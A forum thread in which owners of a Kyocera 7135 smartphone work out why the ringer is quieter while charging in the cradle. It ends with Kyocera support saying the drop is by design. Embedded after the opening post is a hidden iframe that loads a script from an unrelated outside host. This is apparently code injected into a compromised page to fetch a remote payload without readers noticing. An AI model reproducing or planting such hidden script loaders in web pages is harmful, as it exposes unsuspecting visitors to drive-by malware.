+ Reply to Thread

Phone ringing while in the cradle

Has anyone noticed that the phone doesn't ring as loud when it is in the hotsnc cradle? I can barely hear it in the cradle but it's nice and loud outside of it.

When it's in the cradle, the incoming calls ringer volume is still high, and when I assign the ringer while the phone is in the cradle it plays loud, but when a phone call comes in, it (as well as the message and voice mail alerts) is barely discernable.

Am I missing something?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

last night i was cycling through the alert sounds within calendar. when i selected a different sound to demo it i got nothing. i had turned the system sound off but that should not have affected the alert sound which was set to medium.

after a soft reset my sound was back in business.

If you’re asking about the 6035’s ringer volume while in the cradle, I’ve always had that problem. Searching this board, it sounds like a common issue...

Soft ringer in cradle?

Phone rings even when set to vibrate?

Smartphone Tonz

If your asking about the 7135’s ringer volume while in the cradle, I have no idea because Sprint is a :complain!!!

I'm referring to the 7135.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

PHONE RINGER

My phone rings as loud in the cradle as it does when out.....
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Hmmm. Looks like I may have a bad unit. I am in the process of a hard reset to see if that resolves the issue. Thanks for your input!

Originally posted by bones boy
    I'm referring to the 7135.
    As a Sprint customer still waiting… :violinist

If you look real close you can almost see a little bit of sympathy in the corner of my eye….:awink

bones boy,

I was just chastised for my unsympathetic reply. My most humble apologies. My reply was only sarcasm born out of frustration with Sprint and I am now beating myself repeatedly with the mouse as penance for my crime… :devillook:smash

:eyesroll

Do you have your 7135 set to vibrate then ring? If so, when it is done vibrating, it rings at full volume, even if the ringer volume is set to escalate. WHen you insert the 7135 into a power source (cradle), it bypasses the vibrate mode and goes right to ringing. If set to escalate volume, you would hear a lower ringer volume at first.

That could be the scenario, not sure if it's yours..

Hotsync I am set at "vibrate then ring" and the setting is on "high". It does not vibrate in the cradle. Like I had mentioned the ringing is significantly lower in the cradle while charging. I have the "techno" ring as the ringer although it does this with the other rings as well.

And to cammoore, no apology necessary. Many of my TDMA friends warned me about you CDMA folks so I was prepared!! :lol3

At least we're not GSM folk.
    ~'kito
    pdaPhoneHome Moderator

copy of this note sent to Kyocera tech support

I have made a discovery - this phone ring problem only happens if you're set to "Vibe then Ring". If you're set to "Ring Only", it rings just as loud in the cradle or while charging as it does out of the cradle and not charging. If you're set to "Vibe then Ring", it does not vibrate in the cradle while charging, but it plays at a low volume throughout the ring.

Also, this is not a cradle issue, as the low ring phenomena happens only when charging, whether you are in the cradle or not. The phone in the cradle and not charging acts normally (just like it would on your hip).

I am asking Kyocera to test and maybe they can let me know if it's just a flaw in the software or maybe my phone has been monkeyed with... :smash

Hey, don't slow down the Verizon release, just because it is a little quieter in the cradle!
    ~'kito
    pdaPhoneHome Moderator

Bones boy,

I just checked my 6035 and same thing. If it is not charging, but in the cradle, it rings nice and loud.

If it's a software bug, it's an old one.

Thanks for checking, cammoore. I have a note in to Kyocera and am waiting for their "official" response.

Guess it's not a BUG

Here is the official response from Kyocera. Dunn dun dun dun dun DUNNNNNNN!!!!!:
    -----------------------------------------------------------------
    Thank you for contacting Kyocera Wireless.

According to the phone designers and programmers, the change in ring volume
    while charging that you reported is by design to allow more of the charger’s
    energy to be routed to the charging battery.

For any future issues, please visit: http://support.kyocera-wireless.com/
    to get instant graphical answers to your questions.

Kind Regards,
    Kyocera Technical Support
    Support@Kyocera-wireless.com

Re: Guess it's not a BUG

Originally posted by bones boy
    Here is the official response from Kyocera. Dunn dun dun dun dun DUNNNNNNN!!!!!:
    -----------------------------------------------------------------
    Thank you for contacting Kyocera Wireless.

According to the phone designers and programmers, the change in ring volume
    while charging that you reported is by design to allow more of the charger’s
    energy to be routed to the charging battery.

For any future issues, please visit: http://support.kyocera-wireless.com/
    to get instant graphical answers to your questions.

Kind Regards,
    Kyocera Technical Support
    Support@Kyocera-wireless.com
    Rule one: It’s never a mistake, it’s a feature.